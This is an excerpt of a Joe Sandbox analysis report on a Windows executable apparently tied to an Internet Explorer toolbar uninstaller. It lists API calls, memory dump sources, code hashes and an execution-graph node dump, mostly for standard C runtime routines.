                                                • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00711097
                                                • FreeLibrary.KERNELBASE(00000000), ref: 007110A4
                                                • CloseHandle.KERNELBASE(00000000), ref: 007110AB
                                                • CoUninitialize.COMBASE ref: 007110B1
                                                • LocalFree.KERNEL32(00000000), ref: 007110BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                • API String ID: 474438367-4110843154
                                                • Opcode ID: 436e64001422df092c7bb7c8ca7d0d67f732d3ea0f41b99828173f632dcc0220
                                                • Instruction ID: 814ff760058c00cb76301f16e0c5bfadb23a36d2d58c356ce0fe1f8c53a60962
                                                • Opcode Fuzzy Hash: 436e64001422df092c7bb7c8ca7d0d67f732d3ea0f41b99828173f632dcc0220
                                                • Instruction Fuzzy Hash: 7511D232A05259EB83609B6CAC48ADB3758FB4C751701C529F642D60D0DF6DC986C6BB

                                                Control-flow Graph

                                                APIs
                                                • ___crtCorExitProcess.LIBCMT ref: 0071146D
                                                  • Part of subcall function 0071143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00711472,?,?,007154EE,000000FF,0000001E,?,007136FC,?,00000001,?,?,00712A2A,00000018), ref: 00711444
                                                  • Part of subcall function 0071143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00711454
                                                • ExitProcess.KERNEL32 ref: 00711476
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                • String ID:
                                                • API String ID: 2427264223-0
                                                • Opcode ID: 104446178f49452becf0f638dc357cdae872347aaefbf0a95dc39e4d96f5c575
                                                • Instruction ID: a7e9ef55239d8c2d10039e559b594f77c36eacc5121e2438a83f5e6810431cc2
                                                • Opcode Fuzzy Hash: 104446178f49452becf0f638dc357cdae872347aaefbf0a95dc39e4d96f5c575
                                                • Instruction Fuzzy Hash: B6B0923100014CFBDB022F1ADC0E88D3F2AFB807A0BA0C020F908490B1DF76AD929A95

                                                Control-flow Graph

                                                APIs
                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00712630
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: CreateHeap
                                                • String ID:
                                                • API String ID: 10892065-0
                                                • Opcode ID: ac42449d4e93016a5d5476e31aa6379dedde12fe91ea85bb86f1bab9b4a611f7
                                                • Instruction ID: b9c976a3eaf4b8c7eba44132b7b63c4db75da95df30f449b456b5d7612dbad57
                                                • Opcode Fuzzy Hash: ac42449d4e93016a5d5476e31aa6379dedde12fe91ea85bb86f1bab9b4a611f7
                                                • Instruction Fuzzy Hash: D7D05E32A543889EDB405F796C087A23BDCD384395F10C436B90CC61D1E678C6918A08

                                                Control-flow Graph

                                                APIs
                                                • _doexit.LIBCMT ref: 0071168D
                                                  • Part of subcall function 00711555: __lock.LIBCMT ref: 00711563
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 0071159A
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 007115AF
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 007115D9
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 007115EF
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 007115FC
                                                  • Part of subcall function 00711555: __initterm.LIBCMT ref: 0071162B
                                                  • Part of subcall function 00711555: __initterm.LIBCMT ref: 0071163B
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                • String ID:
                                                • API String ID: 1597249276-0
                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                • Instruction ID: d276b4340be49223cc77b4be538260ff7967a89cb2e5c9cf61ed0c2443e47d19
                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                • Instruction Fuzzy Hash: 4EB0123258030C73DB20258AEC07F463F1E87C0BA4F650020FB0C1D1F1A9A3B9B180CA

                                                Control-flow Graph

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00711346
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0071135B
                                                • UnhandledExceptionFilter.KERNEL32(0071816C), ref: 00711366
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00711382
                                                • TerminateProcess.KERNEL32(00000000), ref: 00711389
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: dfbd9b6c14d0c4c7c310279ca3163dc71817240ad5be03f498e1d85098bcd809
                                                • Instruction ID: 2c6f5c772727e1a77f504da246d0228678b2a99c8e8c5a83320fc1569c73273c
                                                • Opcode Fuzzy Hash: dfbd9b6c14d0c4c7c310279ca3163dc71817240ad5be03f498e1d85098bcd809
                                                • Instruction Fuzzy Hash: DD21EFB4A02A08EFCB51DF2CFD456D43BB0BB08352B40C01AE54886AE5EB7C5985CB5F

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00719458,0000000C,00712320,00000000,00000000,?,0071174F,00000003,?,?,?,?,?,?,007110F6), ref: 007121F7
                                                • __crt_waiting_on_module_handle.LIBCMT ref: 00712202
                                                  • Part of subcall function 007113E1: Sleep.KERNEL32(000003E8,00000000,?,00712148,KERNEL32.DLL,?,00712194,?,0071174F,00000003), ref: 007113ED
                                                  • Part of subcall function 007113E1: GetModuleHandleW.KERNEL32(?,?,00712148,KERNEL32.DLL,?,00712194,?,0071174F,00000003,?,?,?,?,?,?,007110F6), ref: 007113F6
                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0071222B
                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0071223B
                                                • __lock.LIBCMT ref: 0071225D
                                                • InterlockedIncrement.KERNEL32(0071A4D8), ref: 0071226A
                                                • __lock.LIBCMT ref: 0071227E
                                                • ___addlocaleref.LIBCMT ref: 0071229C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                • API String ID: 1028249917-2843748187
                                                • Opcode ID: 3992cd856302958faa39ab3caf54851ed09449665e9e5c2d92852413fa9ee823
                                                • Instruction ID: 6015eba37c5c271b2f8a79cfabeef463cf08c8f0235b6de395fa68d7552e2e0d
                                                • Opcode Fuzzy Hash: 3992cd856302958faa39ab3caf54851ed09449665e9e5c2d92852413fa9ee823
                                                • Instruction Fuzzy Hash: 0711A570940701DEE760AF7DD849BCEBBE0AF14310F208519E499936E1CB7C96928B65

                                                Control-flow Graph

                                                APIs
                                                • __getptd.LIBCMT ref: 007140AC
                                                  • Part of subcall function 00712345: __getptd_noexit.LIBCMT ref: 00712348
                                                  • Part of subcall function 00712345: __amsg_exit.LIBCMT ref: 00712355
                                                • __amsg_exit.LIBCMT ref: 007140CC
                                                • __lock.LIBCMT ref: 007140DC
                                                • InterlockedDecrement.KERNEL32(?), ref: 007140F9
                                                • InterlockedIncrement.KERNEL32(02762B98), ref: 00714124
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 4271482742-0
                                                • Opcode ID: 0e6624ccf5dff9bdc4faa3411fd74ce1828cbe7e52c2a8192f27d5539eb30b67
                                                • Instruction ID: 6c61644db7919abef0249c91b462ff0b488348620ce8eca8f5bd13e060ddc0bc
                                                • Opcode Fuzzy Hash: 0e6624ccf5dff9bdc4faa3411fd74ce1828cbe7e52c2a8192f27d5539eb30b67
                                                • Instruction Fuzzy Hash: 99016131902615EBCB61AF2D980A7DD7360BF14B60F15C055E900A76D1CB3CA9D2DBD6

                                                Control-flow Graph

                                                APIs
                                                • __lock.LIBCMT ref: 0071360C
                                                  • Part of subcall function 00712AA0: __mtinitlocknum.LIBCMT ref: 00712AB6
                                                  • Part of subcall function 00712AA0: __amsg_exit.LIBCMT ref: 00712AC2
                                                  • Part of subcall function 00712AA0: EnterCriticalSection.KERNEL32(?,?,?,00715600,00000004,00719628,0000000C,00713746,?,?,00000000,00000000,00000000,?,007122F7,00000001), ref: 00712ACA
                                                • ___sbh_find_block.LIBCMT ref: 00713617
                                                • ___sbh_free_block.LIBCMT ref: 00713626
                                                • HeapFree.KERNEL32(00000000,?,00719568,0000000C,00712A81,00000000,007194C8,0000000C,00712ABB,?,?,?,00715600,00000004,00719628,0000000C), ref: 00713656
                                                • GetLastError.KERNEL32(?,00715600,00000004,00719628,0000000C,00713746,?,?,00000000,00000000,00000000,?,007122F7,00000001,00000214), ref: 00713667
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 2714421763-0
                                                • Opcode ID: f201788023439613b148c2c2085ca750af5791352b19563ff4294978c657062f
                                                • Instruction ID: a9c0ccd19e66ade26344c95fcf1202c106190d47fe4ce82961f0c3804088a174
                                                • Opcode Fuzzy Hash: f201788023439613b148c2c2085ca750af5791352b19563ff4294978c657062f
                                                • Instruction Fuzzy Hash: 91016271D04305FADB206F7D9C0ABDD7A64AF11761F608019F504661D2CB3C8AD1CA99

                                                Control-flow Graph

                                                APIs
                                                • __getptd.LIBCMT ref: 00713E10
                                                  • Part of subcall function 00712345: __getptd_noexit.LIBCMT ref: 00712348
                                                  • Part of subcall function 00712345: __amsg_exit.LIBCMT ref: 00712355
                                                • __getptd.LIBCMT ref: 00713E27
                                                • __amsg_exit.LIBCMT ref: 00713E35
                                                • __lock.LIBCMT ref: 00713E45
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 3521780317-0
                                                • Opcode ID: 47388e196234253acc81e9106d1960a848ece670871485aab4be61be0dafa70f
                                                • Instruction ID: bd6c06169d36d8ca834de2483ca2268d5181be520a789cdccfc664c47e33c3c3
                                                • Opcode Fuzzy Hash: 47388e196234253acc81e9106d1960a848ece670871485aab4be61be0dafa70f
                                                • Instruction Fuzzy Hash: E1F09032900301DBE720BB7C980B7CD72A0AF44B20F108149E455976D2CB7C9AD68B52

                                                Execution Graph

                                                Execution Coverage:6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:1047
                                                Total number of Limit Nodes:29
3913->3905 3914 1f2f9f 3913->3914 3917 1f2fab __mtinitlocknum 3914->3917 3915 1f3007 3916 1f2fe8 3915->3916 3921 1f3016 3915->3921 3920 1f20f9 __decode_pointer 6 API calls 3916->3920 3917->3915 3917->3916 3918 1f2fd2 3917->3918 3922 1f2fce 3917->3922 3919 1f22cc __getptd_noexit 66 API calls 3918->3919 3923 1f2fd7 _siglookup 3919->3923 3920->3923 3924 1f2c72 _strcat_s 66 API calls 3921->3924 3922->3918 3922->3921 3926 1f307d 3923->3926 3928 1f1697 _raise 66 API calls 3923->3928 3934 1f2fe0 __mtinitlocknum 3923->3934 3925 1f301b 3924->3925 3927 1f2c0a _strcat_s 6 API calls 3925->3927 3929 1f2aa0 __lock 66 API calls 3926->3929 3930 1f3088 3926->3930 3927->3934 3928->3926 3929->3930 3931 1f20f0 __init_pointers 6 API calls 3930->3931 3932 1f30bd 3930->3932 3931->3932 3938 1f3113 3932->3938 3934->3905 3936 1f1555 _doexit 66 API calls 3935->3936 3937 1f16a8 3936->3937 3939 1f3119 3938->3939 3940 1f3120 3938->3940 3942 1f29c6 LeaveCriticalSection 3939->3942 3940->3934 3942->3940 3969 1f26b0 3970 1f26dc 3969->3970 3971 1f26e9 3969->3971 3972 1f10cc __crtLCMapStringA_stat 5 API calls 3970->3972 3973 1f10cc __crtLCMapStringA_stat 5 API calls 3971->3973 3972->3971 3982 1f26f9 __except_handler4 __IsNonwritableInCurrentImage 3973->3982 3974 1f277c 3975 1f2752 __except_handler4 3975->3974 3976 1f276c 3975->3976 3977 1f10cc __crtLCMapStringA_stat 5 API calls 3975->3977 3978 1f10cc __crtLCMapStringA_stat 5 API calls 3976->3978 3977->3976 3978->3974 3980 1f27cb __except_handler4 3981 1f27ff 3980->3981 3983 1f10cc __crtLCMapStringA_stat 5 API calls 3980->3983 3984 1f10cc __crtLCMapStringA_stat 5 API calls 3981->3984 3982->3974 3982->3975 3985 1f51ca RtlUnwind 3982->3985 3983->3981 3984->3975 3985->3980 3986 1f122e 3989 1f18fe 3986->3989 3990 1f22cc __getptd_noexit 66 API calls 3989->3990 3991 1f123f 3990->3991 3943 1f458d 3946 1f29c6 LeaveCriticalSection 3943->3946 3945 1f4594 3946->3945 4192 1f67c8 RtlUnwind 4193 1f4247 4203 1f41cb 4193->4203 4196 1f4272 setSBCS 4197 1f10cc 
__crtLCMapStringA_stat 5 API calls 4196->4197 4198 1f442a 4197->4198 4199 1f42b6 IsValidCodePage 4199->4196 4200 1f42c8 GetCPInfo 4199->4200 4200->4196 4202 1f42db __crtLCMapStringA_stat __setmbcp_nolock 4200->4202 4210 1f3f0d GetCPInfo 4202->4210 4220 1f4144 4203->4220 4206 1f41ea GetOEMCP 4209 1f41fa 4206->4209 4207 1f4208 4208 1f420d GetACP 4207->4208 4207->4209 4208->4209 4209->4196 4209->4199 4209->4202 4211 1f3ff3 4210->4211 4214 1f3f41 __crtLCMapStringA_stat 4210->4214 4216 1f10cc __crtLCMapStringA_stat 5 API calls 4211->4216 4275 1f5fe2 4214->4275 4218 1f409e 4216->4218 4218->4202 4219 1f6415 ___crtLCMapStringA 101 API calls 4219->4211 4221 1f4157 4220->4221 4227 1f41a4 4220->4227 4222 1f2345 __getptd 66 API calls 4221->4222 4223 1f415c 4222->4223 4224 1f4184 4223->4224 4228 1f3e04 4223->4228 4224->4227 4243 1f40a0 4224->4243 4227->4206 4227->4207 4229 1f3e10 __mtinitlocknum 4228->4229 4230 1f2345 __getptd 66 API calls 4229->4230 4231 1f3e15 4230->4231 4232 1f3e43 4231->4232 4233 1f3e27 4231->4233 4234 1f2aa0 __lock 66 API calls 4232->4234 4235 1f2345 __getptd 66 API calls 4233->4235 4236 1f3e4a 4234->4236 4238 1f3e2c 4235->4238 4259 1f3dc6 4236->4259 4240 1f3e3a __mtinitlocknum 4238->4240 4242 1f1411 __amsg_exit 66 API calls 4238->4242 4240->4224 4242->4240 4244 1f40ac __mtinitlocknum 4243->4244 4245 1f2345 __getptd 66 API calls 4244->4245 4246 1f40b1 4245->4246 4247 1f2aa0 __lock 66 API calls 4246->4247 4255 1f40c3 4246->4255 4249 1f40e1 4247->4249 4248 1f412a 4271 1f413b 4248->4271 4249->4248 4253 1f40f8 InterlockedDecrement 4249->4253 4254 1f4112 InterlockedIncrement 4249->4254 4250 1f1411 __amsg_exit 66 API calls 4252 1f40d1 __mtinitlocknum 4250->4252 4252->4227 4253->4254 4256 1f4103 4253->4256 4254->4248 4255->4250 4255->4252 4256->4254 4257 1f35ee __freea 66 API calls 4256->4257 4258 1f4111 4257->4258 4258->4254 4260 1f3dca 4259->4260 4261 1f3dfc 4259->4261 4260->4261 4262 1f3c9e ___addlocaleref 8 API calls 4260->4262 4267 1f3e6e 4261->4267 4263 
1f3ddd 4262->4263 4263->4261 4264 1f3d2d ___removelocaleref 8 API calls 4263->4264 4265 1f3de8 4264->4265 4265->4261 4266 1f3b55 ___freetlocinfo 66 API calls 4265->4266 4266->4261 4270 1f29c6 LeaveCriticalSection 4267->4270 4269 1f3e75 4269->4238 4270->4269 4274 1f29c6 LeaveCriticalSection 4271->4274 4273 1f4142 4273->4255 4274->4273 4276 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4275->4276 4277 1f5ff5 4276->4277 4285 1f5e28 4277->4285 4280 1f6415 4281 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4280->4281 4282 1f6428 4281->4282 4373 1f6070 4282->4373 4286 1f5e49 GetStringTypeW 4285->4286 4287 1f5e74 4285->4287 4288 1f5e69 GetLastError 4286->4288 4289 1f5e61 4286->4289 4287->4289 4290 1f5f5b 4287->4290 4288->4287 4291 1f5ead MultiByteToWideChar 4289->4291 4308 1f5f55 4289->4308 4313 1f6b1a GetLocaleInfoA 4290->4313 4297 1f5eda 4291->4297 4291->4308 4293 1f10cc __crtLCMapStringA_stat 5 API calls 4295 1f3fae 4293->4295 4295->4280 4296 1f5eef __crtLCMapStringA_stat __alloca_probe_16 4302 1f5f28 MultiByteToWideChar 4296->4302 4296->4308 4297->4296 4300 1f54b5 _malloc 66 API calls 4297->4300 4298 1f5fac GetStringTypeA 4299 1f5fc7 4298->4299 4298->4308 4305 1f35ee __freea 66 API calls 4299->4305 4300->4296 4303 1f5f4f 4302->4303 4304 1f5f3e GetStringTypeW 4302->4304 4309 1f5446 4303->4309 4304->4303 4305->4308 4308->4293 4310 1f5463 4309->4310 4311 1f5452 4309->4311 4310->4308 4311->4310 4312 1f35ee __freea 66 API calls 4311->4312 4312->4310 4314 1f6b4d 4313->4314 4315 1f6b48 4313->4315 4344 1f6b04 4314->4344 4317 1f10cc __crtLCMapStringA_stat 5 API calls 4315->4317 4318 1f5f7f 4317->4318 4318->4298 4318->4308 4319 1f6b63 4318->4319 4320 1f6ba3 GetCPInfo 4319->4320 4321 1f6c2d 4319->4321 4322 1f6bba 4320->4322 4323 1f6c18 MultiByteToWideChar 4320->4323 4324 1f10cc __crtLCMapStringA_stat 5 API calls 4321->4324 4322->4323 4325 1f6bc0 GetCPInfo 4322->4325 4323->4321 4328 1f6bd3 _strlen 4323->4328 4326 1f5fa0 4324->4326 4325->4323 4327 1f6bcd 4325->4327 
4326->4298 4326->4308 4327->4323 4327->4328 4329 1f54b5 _malloc 66 API calls 4328->4329 4333 1f6c05 __crtLCMapStringA_stat __alloca_probe_16 4328->4333 4329->4333 4330 1f6c62 MultiByteToWideChar 4331 1f6c7a 4330->4331 4332 1f6c99 4330->4332 4335 1f6c9e 4331->4335 4336 1f6c81 WideCharToMultiByte 4331->4336 4334 1f5446 __freea 66 API calls 4332->4334 4333->4321 4333->4330 4334->4321 4337 1f6cbd 4335->4337 4338 1f6ca9 WideCharToMultiByte 4335->4338 4336->4332 4339 1f3730 __calloc_crt 66 API calls 4337->4339 4338->4332 4338->4337 4340 1f6cc5 4339->4340 4340->4332 4341 1f6cce WideCharToMultiByte 4340->4341 4341->4332 4342 1f6ce0 4341->4342 4343 1f35ee __freea 66 API calls 4342->4343 4343->4332 4347 1f6f7a 4344->4347 4348 1f6f93 4347->4348 4351 1f6d4b 4348->4351 4352 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4351->4352 4355 1f6d60 4352->4355 4353 1f6d72 4354 1f2c72 _strcat_s 66 API calls 4353->4354 4356 1f6d77 4354->4356 4355->4353 4358 1f6daf 4355->4358 4357 1f2c0a _strcat_s 6 API calls 4356->4357 4362 1f6b15 4357->4362 4361 1f6df4 4358->4361 4363 1f69e5 4358->4363 4360 1f2c72 _strcat_s 66 API calls 4360->4362 4361->4360 4361->4362 4362->4315 4364 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4363->4364 4365 1f69f9 4364->4365 4366 1f6a06 4365->4366 4370 1f6acc 4365->4370 4366->4358 4369 1f5fe2 ___crtGetStringTypeA 90 API calls 4369->4366 4371 1f4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4370->4371 4372 1f6a2e 4371->4372 4372->4369 4374 1f6091 LCMapStringW 4373->4374 4378 1f60ac 4373->4378 4375 1f60b4 GetLastError 4374->4375 4374->4378 4375->4378 4376 1f62aa 4380 1f6b1a ___ansicp 90 API calls 4376->4380 4377 1f6106 4379 1f611f MultiByteToWideChar 4377->4379 4400 1f62a1 4377->4400 4378->4376 4378->4377 4388 1f614c 4379->4388 4379->4400 4382 1f62d2 4380->4382 4381 1f10cc __crtLCMapStringA_stat 5 API calls 4383 1f3fce 4381->4383 4384 1f62eb 4382->4384 4385 1f63c6 LCMapStringA 4382->4385 4382->4400 4383->4219 4386 1f6b63 ___convertcp 73 API calls 4384->4386 
4419 1f6322 4385->4419 4390 1f62fd 4386->4390 4387 1f619d MultiByteToWideChar 4391 1f61b6 LCMapStringW 4387->4391 4412 1f6298 4387->4412 4389 1f54b5 _malloc 66 API calls 4388->4389 4397 1f6165 __alloca_probe_16 4388->4397 4389->4397 4394 1f6307 LCMapStringA 4390->4394 4390->4400 4396 1f61d7 4391->4396 4391->4412 4392 1f63ed 4399 1f35ee __freea 66 API calls 4392->4399 4392->4400 4393 1f35ee __freea 66 API calls 4393->4392 4403 1f6329 4394->4403 4394->4419 4395 1f5446 __freea 66 API calls 4395->4400 4398 1f61e0 4396->4398 4402 1f6209 4396->4402 4397->4387 4397->4400 4401 1f61f2 LCMapStringW 4398->4401 4398->4412 4399->4400 4400->4381 4401->4412 4405 1f54b5 _malloc 66 API calls 4402->4405 4415 1f6224 __alloca_probe_16 4402->4415 4406 1f54b5 _malloc 66 API calls 4403->4406 4416 1f633a __crtLCMapStringA_stat __alloca_probe_16 4403->4416 4404 1f6258 LCMapStringW 4407 1f6292 4404->4407 4410 1f6270 WideCharToMultiByte 4404->4410 4405->4415 4406->4416 4408 1f5446 __freea 66 API calls 4407->4408 4408->4412 4409 1f6378 LCMapStringA 4413 1f6398 4409->4413 4414 1f6394 4409->4414 4410->4407 4412->4395 4417 1f6b63 ___convertcp 73 API calls 4413->4417 4418 1f5446 __freea 66 API calls 4414->4418 4415->4404 4415->4412 4416->4409 4416->4419 4417->4414 4418->4419 4419->4392 4419->4393 3196 1f1104 3233 1f264c 3196->3233 3198 1f1110 GetStartupInfoW 3199 1f1133 3198->3199 3234 1f261b HeapCreate 3199->3234 3202 1f1183 3236 1f248e GetModuleHandleW 3202->3236 3206 1f1194 __RTC_Initialize 3270 1f1dde 3206->3270 3207 1f10db _fast_error_exit 66 API calls 3207->3206 3209 1f11a2 3210 1f11ae GetCommandLineW 3209->3210 3344 1f1411 3209->3344 3285 1f1d81 GetEnvironmentStringsW 3210->3285 3214 1f11bd 3294 1f1cd3 GetModuleFileNameW 3214->3294 3217 1f11d2 3300 1f1aa4 3217->3300 3218 1f1411 __amsg_exit 66 API calls 3218->3217 3221 1f11e3 3313 1f14d0 3221->3313 3223 1f1411 __amsg_exit 66 API calls 3223->3221 3224 1f11ea 3225 1f1411 __amsg_exit 66 API calls 3224->3225 3226 1f11f5 __wwincmdln 3224->3226 
